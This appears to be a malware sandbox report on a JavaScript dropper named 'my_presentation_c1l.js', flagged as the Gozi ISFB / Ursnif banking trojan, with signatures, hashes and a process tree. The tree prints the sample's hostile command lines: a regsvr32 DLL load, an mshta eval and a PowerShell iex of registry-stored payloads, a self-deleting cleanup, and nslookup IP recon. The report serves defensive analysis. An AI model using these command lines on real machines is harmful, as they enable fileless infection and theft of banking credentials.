Overview

overview

10

Static

static

my_present...c1l.js

windows7_x64

10

my_present...c1l.js

windows10_x64

10

Analysis

  • max time kernel
    150s
  • max time network
    132s
  • platform
    windows10_x64
  • resource
    win10v200430
  • submitted
    24-05-2020 13:44

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    my_presentation_c1l.js

  • Size

    3.8MB

  • MD5

    763c2375aea17fffc6c0e24c2808570c

  • SHA1

    10f7b2d55a9a10902b91fb1c0e632e7db257006e

  • SHA256

    e4276d8f476bc00d0e1b946a5e4da025575753c7c1b4bbff3408f8a07461f72d

  • SHA512

    9a59f0c887368105ff7a5a329a775ff107a7e9ed306d56e4471aa4f7258b581ecc7960edb0ce89dbc411b23244fb45e561b4e2debbd71699df77467e2bd68beb

Score
10/10
spywarebankertrojangozi_ifsbursnif

Malware Config

Signatures

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spyware
  • Program crash 1 IoCs
  • Suspicious behavior: MapViewOfSection 7 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Checks whether UAC is enabled 3 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 32 IoCs
  • Suspicious behavior: EnumeratesProcesses 1654 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Ursnif, Dreambot

    Ursnif is a variant of the Gozi IFSB with more capabilities.

    bankertrojanursnif
  • Loads dropped DLL 1 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 36 IoCs
    adwarespyware
  • Gozi, Gozi IFSB

    Gozi ISFB is a well-known and widely distributed banking trojan.

    bankertrojangozi_ifsb
  • Suspicious use of WriteProcessMemory 54 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of SetThreadContext
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of WriteProcessMemory
    PID:2992
    • C:\Windows\system32\wscript.exe
      wscript.exe C:\Users\Admin\AppData\Local\Temp\my_presentation_c1l.js
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2916
      • C:\Windows\System32\regsvr32.exe
        "C:\Windows\System32\regsvr32.exe" -s C:\Users\Admin\AppData\Local\Temp\\zPNqVPAAFG.txt
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1572
        • C:\Windows\SysWOW64\regsvr32.exe
          -s C:\Users\Admin\AppData\Local\Temp\\zPNqVPAAFG.txt
          4⤵
          • Loads dropped DLL
          PID:1616
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 1616 -s 868
            5⤵
            • Program crash
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious behavior: EnumeratesProcesses
            PID:3824
    • C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" "about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\28FFF86C-67D8-9AFA-31DC-8B6EF5D0EF82\\AxInrvps'));if(!window.flag)close()</script>"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3848
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\28FFF86C-67D8-9AFA-31DC-8B6EF5D0EF82").AppCbcd))
        3⤵
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:3484
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\svnia10o\svnia10o.cmdline"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1072
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5FBA.tmp" "c:\Users\Admin\AppData\Local\Temp\svnia10o\CSCA6A27B50AE66490F96EB502BFA81E1EA.TMP"
            5⤵
              PID:2428
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\licg00eg\licg00eg.cmdline"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:808
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES60A4.tmp" "c:\Users\Admin\AppData\Local\Temp\licg00eg\CSCF9388D6C6865475BBD3945C4A9A3C852.TMP"
              5⤵
                PID:1528
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\zPNqVPAAFG.txt"
          2⤵
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:2752
          • C:\Windows\system32\PING.EXE
            ping localhost -n 5
            3⤵
            • Suspicious behavior: CmdExeWriteProcessMemorySpam
            • Runs ping.exe
            PID:2984
        • C:\Windows\system32\cmd.exe
          cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\FB3E.bi1"
          2⤵
            PID:2580
            • C:\Windows\system32\nslookup.exe
              nslookup myip.opendns.com resolver1.opendns.com
              3⤵
                PID:652
            • C:\Windows\system32\cmd.exe
              cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\FAB6.bi1"
              2⤵
                PID:2428
                • C:\Windows\system32\nslookup.exe
                  nslookup myip.opendns.com resolver1.opendns.com
                  3⤵
                    PID:672
                • C:\Windows\system32\cmd.exe
                  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\FB3E.bi1"
                  2⤵
                    PID:3940
                  • C:\Windows\system32\cmd.exe
                    cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\FAB6.bi1"
                    2⤵
                      PID:3136
                    • C:\Program Files\Windows Mail\WinMail.exe
                      "C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE
                      2⤵
                        PID:2712
                      • C:\Program Files\Windows Mail\WinMail.exe
                        "C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE
                        2⤵
                          PID:3036
                      • C:\Windows\System32\RuntimeBroker.exe
                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                        1⤵
                          PID:3352
                        • C:\Program Files\Internet Explorer\iexplore.exe
                          "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
                          1⤵
                          • Checks whether UAC is enabled
                          • Suspicious use of SetWindowsHookEx
                          • Suspicious use of FindShellTrayWindow
                          • Modifies Internet Explorer settings
                          • Suspicious use of WriteProcessMemory
                          PID:3376
                          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3376 CREDAT:82945 /prefetch:2
                            2⤵
                            • Checks whether UAC is enabled
                            • Suspicious use of SetWindowsHookEx
                            • Modifies Internet Explorer settings
                            PID:2200
                          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3376 CREDAT:82951 /prefetch:2
                            2⤵
                            • Checks whether UAC is enabled
                            • Suspicious use of SetWindowsHookEx
                            • Modifies Internet Explorer settings
                            PID:3324

                        Network

                        MITRE ATT&CK Enterprise v6

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • memory/2712-29-0x000002A223100000-0x000002A223101000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/2752-22-0x00000224DE4F0000-0x00000224DE5A1000-memory.dmp

                          Filesize

                          708KB

                          Download

                        • memory/2752-16-0x00000224DE1B0000-0x00000224DE1B1000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/2984-21-0x000001BCCD6D0000-0x000001BCCD6D1000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/2992-12-0x0000000000E00000-0x0000000000E01000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/2992-19-0x0000000005590000-0x0000000005641000-memory.dmp

                          Filesize

                          708KB

                          Download

                        • memory/2992-17-0x0000000005650000-0x0000000005701000-memory.dmp

                          Filesize

                          708KB

                          Download

                        • memory/2992-15-0x0000000005590000-0x0000000005641000-memory.dmp

                          Filesize

                          708KB

                          Download

                        • memory/3036-33-0x000002ADC07A0000-0x000002ADC07A1000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/3352-14-0x000001D9A9D70000-0x000001D9A9D71000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/3376-18-0x0000013F6E750000-0x0000013F6E751000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/3484-13-0x0000022028690000-0x0000022028741000-memory.dmp

                          Filesize

                          708KB

                          Download

                        • memory/3824-23-0x0000000004B20000-0x0000000004B21000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/3824-24-0x00000000055A0000-0x00000000055A1000-memory.dmp

                          Filesize

                          4KB

                          Download